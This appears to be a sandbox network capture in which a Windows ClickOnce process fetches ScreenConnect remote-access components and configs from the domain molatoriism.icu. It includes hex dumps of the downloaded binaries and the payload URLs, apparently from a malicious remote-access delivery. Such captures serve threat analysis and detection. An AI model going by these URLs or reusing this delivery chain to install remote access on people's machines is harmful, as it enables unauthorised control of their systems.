2024-11-07 16:55:58 UTC | 598 | IN | Data Ascii: 4000<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmln
2024-11-07 16:55:58 UTC | 1369 | IN | Data Ascii: ct.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" /> <application /> <entryPoint> <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.89
2024-11-07 16:55:58 UTC | 1369 | IN | Data Ascii: ependency> <dependency> <dependentAssembly dependencyType="install" allowDelayedBinding="true" codebase="ScreenConnect.Client.dll" size="197120"> <assemblyIdentity name="ScreenConnect.Client" version="24.2.10.8991" publicKeyToken="4B14C015C
2024-11-07 16:55:58 UTC | 1369 | IN | Data Ascii: </dependency> <dependency> <dependentAssembly dependencyType="install" allowDelayedBinding="true" codebase="ScreenConnect.Core.dll" size="548864"> <assemblyIdentity name="ScreenConnect.Core" version="24.2.10.8991" publicKeyToken="4B14C015C
2024-11-07 16:55:58 UTC | 1369 | IN | Data Ascii: ncy> <dependency> <dependentAssembly dependencyType="install" allowDelayedBinding="true" codebase="ScreenConnect.WindowsClient.exe" size="601376"> <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4
2024-11-07 16:55:58 UTC | 1369 | IN | Data Ascii: 2000/09/xmldsig#sha1" /> <dsig:DigestValue>OOq26dmbXK7slwOITSW+jYEWIKk=</dsig:DigestValue> </hash> </file> <file name="ScreenConnect.WindowsBackstageShell.exe.config" size="266"> <hash> <dsig:Transforms> <dsig:Transf
                                                                                                                                                                                                2024-11-07 16:55:58 UTC1369INData Raw: 65 78 65 2e 63 6f 6e 66 69 67 22 20 73 69 7a 65 3d 22 32 36 36 22 3e 0d 0a 20 20 20 20 3c 68 61 73 68 3e 0d 0a 20 20 20 20 20 20 3c 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 73 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 20 41 6c 67 6f 72 69 74 68 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 48 61 73 68 54 72 61 6e 73 66 6f 72 6d 73 2e 49 64 65 6e 74 69 74 79 22 20 2f 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 73 3e 0d 0a 20 20 20 20 20 20 3c 64 73 69 67 3a 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 73 68 61 31 22 20 2f
                                                                                                                                                                                                Data Ascii: exe.config" size="266"> <hash> <dsig:Transforms> <dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" /> </dsig:Transforms> <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" /
                                                                                                                                                                                                2024-11-07 16:55:58 UTC1369INData Raw: 7a 78 48 36 63 41 56 49 38 55 78 62 6e 72 4a 71 48 58 4d 77 38 58 52 4f 30 46 63 55 4e 51 78 58 41 39 70 49 52 57 72 43 6e 4b 41 6a 74 6a 7a 6d 6b 4c 6d 4d 2b 68 42 2f 6f 4f 53 2f 56 58 41 41 75 75 73 69 42 79 70 37 6d 2b 6c 6f 77 2f 5a 47 68 2b 74 66 43 73 42 4b 30 2b 6c 76 51 2f 38 52 6d 61 30 43 70 53 7a 76 76 76 2b 4b 66 35 6f 39 51 64 64 5a 4f 2f 6b 33 7a 71 4e 58 44 72 33 6c 64 35 45 32 75 79 48 68 68 59 56 73 75 30 6c 52 37 6c 44 43 57 6f 61 31 4a 52 52 61 56 63 4b 30 46 54 4d 58 2f 6e 30 39 75 55 31 39 69 48 33 51 66 42 52 65 4c 45 67 4d 75 4a 6a 65 48 72 61 44 53 39 6b 63 6f 53 6d 42 5a 30 42 5a 78 6c 4d 4c 79 4b 55 73 69 68 76 72 65 74 76 63 35 4b 56 78 79 4e 47 32 56 34 4d 6c 64 4b 52 43 76 59 39 76 46 76 50 35 77 31 6b 36 50 47 46 50 42 6a 34
                                                                                                                                                                                                Data Ascii: zxH6cAVI8UxbnrJqHXMw8XRO0FcUNQxXA9pIRWrCnKAjtjzmkLmM+hB/oOS/VXAAuusiByp7m+low/ZGh+tfCsBK0+lvQ/8Rma0CpSzvvv+Kf5o9QddZO/k3zqNXDr3ld5E2uyHhhYVsu0lR7lDCWoa1JRRaVcK0FTMX/n09uU19iH3QfBReLEgMuJjeHraDS9kcoSmBZ0BZxlMLyKUsihvretvc5KVxyNG2V4MldKRCvY9vFvP5w1k6PGFPBj4
                                                                                                                                                                                                2024-11-07 16:55:58 UTC1369INData Raw: 3a 6d 70 65 67 3a 6d 70 65 67 32 31 3a 32 30 30 33 3a 30 31 2d 52 45 4c 2d 52 2d 4e 53 22 20 78 6d 6c 6e 73 3a 61 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 70 6b 69 2f 32 30 30 35 2f 41 75 74 68 65 6e 74 69 63 6f 64 65 22 3e 3c 72 3a 67 72 61 6e 74 3e 3c 61 73 3a 4d 61 6e 69 66 65 73 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 48 61 73 68 3d 22 38 62 31 32 63 31 65 34 38 38 32 34 65 62 31 63 30 33 63 37 32 31 61 64 35 30 65 32 37 39 64 31 64 36 30 32 62 63 39 35 22 20 44 65 73 63 72 69 70 74 69 6f 6e 3d 22 22 20 55 72 6c 3d 22 22 3e 3c 61 73 3a 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 43 6c 69
                                                                                                                                                                                                Data Ascii: :mpeg:mpeg21:2003:01-REL-R-NS" xmlns:as="http://schemas.microsoft.com/windows/pki/2005/Authenticode"><r:grant><as:ManifestInformation Hash="8b12c1e48824eb1c03c721ad50e279d1d602bc95" Description="" Url=""><as:assemblyIdentity name="ScreenConnect.WindowsCli
                                                                                                                                                                                                2024-11-07 16:55:58 UTC1369INData Raw: 38 4a 67 4c 30 45 4c 2f 4c 6b 6e 72 74 6c 4f 41 36 36 57 4e 61 76 31 65 58 65 5a 43 76 64 6b 6f 4f 34 43 73 43 41 73 79 51 61 59 46 74 7a 77 79 65 56 4e 48 64 48 53 36 38 47 4b 41 74 44 65 6d 49 36 30 38 69 70 66 71 37 57 63 4f 43 51 4b 46 44 44 57 6a 44 51 43 77 62 4a 6a 77 33 62 6f 66 79 41 53 4e 70 45 46 55 74 66 73 46 68 66 4e 49 45 45 70 55 32 46 53 71 66 51 75 49 39 7a 7a 77 33 2f 31 66 7a 65 36 4e 79 71 59 69 47 58 78 74 75 6a 46 52 38 38 49 31 72 70 4e 37 5a 51 75 48 55 4d 52 30 31 6e 4f 44 57 59 58 70 47 43 65 4f 35 65 74 36 36 45 43 73 73 69 4d 64 76 6d 31 44 42 6d 4a 49 77 64 61 35 36 63 69 5a 6f 37 6c 58 52 33 4a 6a 2b 38 41 67 53 59 61 75 70 35 33 57 62 7a 62 71 31 4b 41 6a 78 71 76 44 6d 37 59 77 75 35 47 43 4b 77 41 70 36 6a 49 73 54 44 74
                                                                                                                                                                                                Data Ascii: 8JgL0EL/LknrtlOA66WNav1eXeZCvdkoO4CsCAsyQaYFtzwyeVNHdHS68GKAtDemI608ipfq7WcOCQKFDDWjDQCwbJjw3bofyASNpEFUtfsFhfNIEEpU2FSqfQuI9zzw3/1fze6NyqYiGXxtujFR88I1rpN7ZQuHUMR01nODWYXpGCeO5et66ECssiMdvm1DBmJIwda56ciZo7lXR3Jj+8AgSYaup53Wbzbq1KAjxqvDm7Ywu5GCKwAp6jIsTDt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49795 | 104.21.96.148 | 443 | 7480 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 16:56:04 UTC | 123 | OUT | GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
Host: molatoriism.icu
Accept-Encoding: gzip
Connection: Keep-Alive
2024-11-07 16:56:04 UTC | 789 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:04 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                CF-Cache-Status: BYPASS
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XXxX945VAfaRzT94qNr0NLjPDarLRDiCl7LytkF0Nnq5fjFR4o5nSyqbljgCYimD4rurnWKj2BIl8mfoG%2FxBvAa8ochvtGVPQNn0XOVPfYpu1%2Bwxeaa1qrdnbl4pbbuF6Gg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedac20efce759-DEN
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=18982&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=714&delivery_rate=152710&cwnd=32&unsent_bytes=0&cid=50f45b5e183c2136&ts=767&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49806 | 104.21.96.148 | 443 | 7480 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 16:56:05 UTC | 107 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
Host: molatoriism.icu
Accept-Encoding: gzip
2024-11-07 16:56:06 UTC | 794 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:06 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                CF-Cache-Status: BYPASS
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c8nlPZnylwm6Qg%2BCSocN71uv57bKuXFYX1TX%2BRbbhhqJaMP3rHE4e9KWi7ibNwnRC5ND9Wb2VvghHm1ElJQcT5ahFWBCEIi6b4uzOLLve97EN9kqiWRK9UX2QG%2ByUEl%2BggU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedacc9a81e8f5-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1403&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=722&delivery_rate=2033707&cwnd=251&unsent_bytes=0&cid=1e3699e7371dab74&ts=839&x=0"
                                                                                                                                                                                                Data Ascii: (+};sH%~(n%-"&{;%-&+o%-&~(pob%o.%o%%o?%oE%{8oC%{;oA{;-(o_ol&*{;o(o_(o_(+s(+Xo*0s}<(
                                                                                                                                                                                                2024-11-07 16:56:06 UTC1369INData Raw: 0a 2d 07 7e 1e 00 00 04 2b 05 7e 1d 00 00 04 6f cb 00 00 0a 03 6f c5 00 00 0a 03 6f cc 00 00 0a 03 6f cd 00 00 0a 03 6f ce 00 00 0a 03 6f cf 00 00 0a 03 6f d0 00 00 0a 28 d1 00 00 0a 2a 4e 03 7e 22 00 00 04 6f d2 00 00 0a 02 03 28 d3 00 00 0a 2a 00 00 13 30 07 00 2a 01 00 00 0a 00 00 11 03 6f c4 00 00 0a 75 0e 00 00 02 0a 06 2c 31 06 6f 2b 00 00 06 2c 29 03 6f c5 00 00 0a 7e 1b 00 00 04 12 01 fe 15 30 00 00 01 07 03 6f c4 00 00 0a 6f c6 00 00 0a 73 be 00 00 0a 6f c7 00 00 0a 03 6f c4 00 00 0a 6f b8 00 00 0a 2c 29 03 6f c5 00 00 0a 7e 1c 00 00 04 12 01 fe 15 30 00 00 01 07 03 6f c4 00 00 0a 6f c6 00 00 0a 73 be 00 00 0a 6f c7 00 00 0a 03 6f c4 00 00 0a 75 0e 00 00 02 0a 06 39 a1 00 00 00 06 6f 2d 00 00 06 39 96 00 00 00 03 6f c5 00 00 0a 7e 2f 00 00 04 03
                                                                                                                                                                                                Data Ascii: -~+~ooooooo(*N~"o(*0*ou,1o+,)o~0oosooo,)o~0oosoou9o-9o~/
                                                                                                                                                                                                2024-11-07 16:56:06 UTC1369INData Raw: 18 7e 60 00 00 0a 72 76 03 00 70 17 6f fe 00 00 0a 14 02 fe 06 4c 00 00 06 73 ef 00 00 0a 73 76 00 00 06 a2 25 19 7e 60 00 00 0a 72 f6 03 00 70 17 6f fe 00 00 0a 14 02 fe 06 4e 00 00 06 73 ef 00 00 0a 73 76 00 00 06 a2 25 1a 7e 60 00 00 0a 72 6a 04 00 70 17 6f fe 00 00 0a 14 02 fe 06 4f 00 00 06 73 ef 00 00 0a 73 76 00 00 06 a2 6f 63 00 00 0a 02 28 e5 00 00 0a 28 1b 00 00 2b 28 1c 00 00 2b 0a 06 6f ff 00 00 0a 28 1d 00 00 2b 14 18 28 1e 00 00 2b 0b 02 28 3e 00 00 06 28 02 01 00 0a 3a 01 01 00 00 02 28 3e 00 00 06 28 03 01 00 0a 0c 07 6f 04 01 00 0a 25 2d 0d 26 12 05 fe 15 17 00 00 1b 11 05 2b 0a 28 05 01 00 0a 73 06 01 00 0a 0d 12 02 28 07 01 00 0a 28 08 01 00 0a 13 04 12 03 28 09 01 00 0a 2d 03 17 2b 0e 12 03 28 0a 01 00 0a 11 04 28 0b 01 00 0a 2c 2a 07
                                                                                                                                                                                                Data Ascii: ~`rvpoLssv%~`rpoNssv%~`rjpoOssvoc((+(+o(+(+(>(:(>(o%-&+(s(((-+((,*
                                                                                                                                                                                                2024-11-07 16:56:06 UTC1369INData Raw: 00 00 04 25 2d 17 26 7e 49 00 00 04 fe 06 9f 00 00 06 73 31 01 00 0a 25 80 4a 00 00 04 28 1f 00 00 2b 28 20 00 00 2b 28 21 00 00 2b 0a 02 28 e5 00 00 0a 28 61 00 00 06 02 28 e5 00 00 0a 06 6f 63 00 00 0a 2a 1e 02 28 23 00 00 06 2a 1a 7e 2c 00 00 04 2a 00 00 13 30 0f 00 25 02 00 00 14 00 00 11 73 a4 00 00 06 0a 06 14 7d 4f 00 00 04 06 14 7d 50 00 00 04 06 14 7d 52 00 00 04 06 14 7d 51 00 00 04 06 14 7d 53 00 00 04 03 19 8d 40 00 00 01 25 16 06 73 e7 00 00 0a 25 17 6f 35 01 00 0a 25 1b 6f 26 00 00 0a 17 8d 40 00 00 01 25 16 06 73 a6 00 00 0a 25 1a 6f 25 00 00 0a 25 7e 20 00 00 04 6f 29 00 00 0a 25 7e 1d 00 00 04 6f ea 00 00 0a 25 73 1b 00 00 06 6f 28 00 00 0a 25 0b 7d 50 00 00 04 07 a2 28 22 00 00 2b 25 0c 7d 52 00 00 04 08 a2 25 17 06 73 e7 00 00 0a 25 1b
                                                                                                                                                                                                Data Ascii: %-&~Is1%J(+( +(!+((a(oc*(#*~,*0%s}O}P}R}Q}S@%s%o5%o&@%s%o%%~ o)%~o%so(%}P("+%}R%s%
                                                                                                                                                                                                2024-11-07 16:56:06 UTC1369INData Raw: 11 02 28 11 00 00 2b 28 23 00 00 2b 6f 4d 01 00 0a 0a 2b 0c 12 00 28 4e 01 00 0a 28 62 00 00 06 12 00 28 4f 01 00 0a 2d eb de 0e 12 00 fe 16 1a 00 00 1b 6f 5b 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 11 00 19 2a 00 0e 00 00 00 00 13 30 02 00 2d 00 00 00 16 00 00 11 02 75 4b 00 00 01 0a 06 2c 0b 06 6f e5 00 00 0a 28 61 00 00 06 02 6f 95 00 00 0a 25 2d 03 26 2b 05 28 0c 01 00 0a 02 6f 50 01 00 0a 2a 72 1f 16 7e 19 00 00 0a 28 1a 00 00 0a 73 51 01 00 0a 72 98 0d 00 70 28 52 01 00 0a 2a 00 00 13 30 04 00 dd 00 00 00 00 00 00 00 28 53 01 00 0a 28 24 00 00 2b 7e 56 00 00 04 25 2d 17 26 7e 55 00 00 04 fe 06 ac 00 00 06 73 55 01 00 0a 25 80 56 00 00 04 28 25 00 00 2b 28 57 01 00 0a 28 26 00 00 2b 28 59 01 00 0a 7e 57 00 00 04 25 2d 17 26 7e 55 00 00 04 fe 06 ad
                                                                                                                                                                                                Data Ascii: (+(#+oM+(N(b(O-o[**0-uK,o(ao%-&+(oP*r~(sQrp(R*0(S($+~V%-&~UsU%V(%+(W(&+(Y~W%-&~U
                                                                                                                                                                                                2024-11-07 16:56:06 UTC1369INData Raw: 64 00 00 04 28 81 01 00 0a 26 06 7b 64 00 00 04 16 d3 28 7b 00 00 0a 2c 21 02 1f 37 16 28 a8 00 00 0a 16 28 a8 00 00 0a 18 20 e8 03 00 00 06 7c 64 00 00 04 28 81 01 00 0a 26 06 7b 64 00 00 04 16 d3 28 7b 00 00 0a 2c 0e 06 02 1f f2 28 8c 01 00 0a 7d 64 00 00 04 06 7b 64 00 00 04 16 d3 28 7b 00 00 0a 2c 02 14 2a 06 fe 06 bc 00 00 06 73 8d 01 00 0a 17 28 35 00 00 2b 2a 00 1b 30 02 00 5d 00 00 00 1e 00 00 11 02 6f 8e 01 00 0a 03 28 8f 01 00 0a 2c 07 02 6f 90 01 00 0a 2a 02 03 73 91 01 00 0a 0a 06 6f 8e 01 00 0a 03 28 8f 01 00 0a 2c 09 06 6f 90 01 00 0a 0b de 27 de 0a 06 2c 06 06 6f 5b 00 00 0a dc 02 6f 90 01 00 0a 0c 08 03 73 92 01 00 0a 0b de 0a 08 2c 06 08 6f 5b 00 00 0a dc 07 2a 00 00 00 01 1c 00 00 02 00 1d 00 19 36 00 0a 00 00 00 00 02 00 47 00 0a 51 00
                                                                                                                                                                                                Data Ascii: d(&{d({,!7(( |d(&{d({,(}d{d({,*s(5+*0]o(,o*so(,o',o[os,o[*6GQ
                                                                                                                                                                                                2024-11-07 16:56:06 UTC1369INData Raw: 2b 6f bc 01 00 0a 0a 2b 66 06 6f bd 01 00 0a 02 28 be 01 00 0a 0b 12 01 28 d7 00 00 0a 02 28 be 01 00 0a 0b 12 01 28 d9 00 00 0a 02 28 bd 00 00 0a 0c 12 02 28 86 01 00 0a 02 28 be 01 00 0a 0b 12 01 28 db 00 00 0a 59 02 28 bd 00 00 0a 0c 12 02 28 bf 01 00 0a 02 28 be 01 00 0a 0b 12 01 28 dd 00 00 0a 59 73 c0 01 00 0a 6f 98 00 00 06 06 6f 70 00 00 0a 2d 92 de 0a 06 2c 06 06 6f 5b 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 18 00 72 8a 00 0a 00 00 00 00 1e 02 28 c1 01 00 0a 2a 22 02 03 28 f9 00 00 0a 2a 22 02 03 6f c2 01 00 0a 2a 00 00 13 30 04 00 60 00 00 00 25 00 00 11 02 6f c3 01 00 0a 0a 12 00 28 86 01 00 0a 02 6f c3 01 00 0a 0a 12 00 28 bf 01 00 0a 02 28 04 01 00 0a 2c 2c 02 6f c3 01 00 0a 0a 12 00 28 86 01 00 0a 6b 02 28 04 01 00 0a 6f c4 01 00 0a 6b 5a
                                                                                                                                                                                                Data Ascii: +o+fo((((((((Y((((Ysoop-,o[*r(*"(*"o*0`%o(o((,,o(k(okZ


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                4192.168.2.949813104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:56:07 UTC111OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                2024-11-07 16:56:08 UTC770INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:08 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OGMeMXoaWfVRfwhoqZtz2UxHDJa9DKRVY6uW3MLq3nbJqxpx%2FU9nWqnfzPp2KEOj%2BBuIoP39zgiLNzJxCjNKJEA3Y9%2FvWzH13F3JZIY8F972FB00GrXDIB9ueyLQavlAksA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedad6ef36e85b-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1339&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=726&delivery_rate=2360228&cwnd=95&unsent_bytes=0&cid=07c09f9c68186f44&ts=826&x=0"
                                                                                                                                                                                                2024-11-07 16:56:08 UTC273INData Raw: 31 30 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a
                                                                                                                                                                                                Data Ascii: 10a<?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime>
                                                                                                                                                                                                2024-11-07 16:56:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                5192.168.2.949824104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:56:08 UTC106OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                2024-11-07 16:56:09 UTC775INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:09 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x7X5GuM%2FfFWgS5mE%2BmKlOZQHMkVCHTDzsYRPwnUPBr40rDWo1V6p%2BcPz73W192R1KQuSD5bFqgVJKz7dZS%2BIUtHJzAAKTEmkcaZ9DkbAwbYdedzADq7FxUJHVDpy3%2BzBwcE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedadffee445f3-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1915&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=721&delivery_rate=1543710&cwnd=251&unsent_bytes=0&cid=210cea38dcc710c2&ts=766&x=0"
                                                                                                                                                                                                2024-11-07 16:56:09 UTC273INData Raw: 31 30 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a
                                                                                                                                                                                                Data Ascii: 10a<?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime>
                                                                                                                                                                                                2024-11-07 16:56:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                6192.168.2.949831104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:56:10 UTC114OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                2024-11-07 16:56:11 UTC771INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:10 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ajCZC09AkPwApUodssNngwhtTWLaGp7EshzkvOaLIyGtJ%2FEvAHd2syuXlCdUzn5Pk46WAJ%2BdGqo5gDzqBCa94mDIml5rRtjn3jV2T8zJmQl8KGAnm4Qhv1kfDMvdEAHa%2FM8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedae8cd64a912-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1998&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=729&delivery_rate=1359624&cwnd=159&unsent_bytes=0&cid=95883dae86aeb20a&ts=776&x=0"
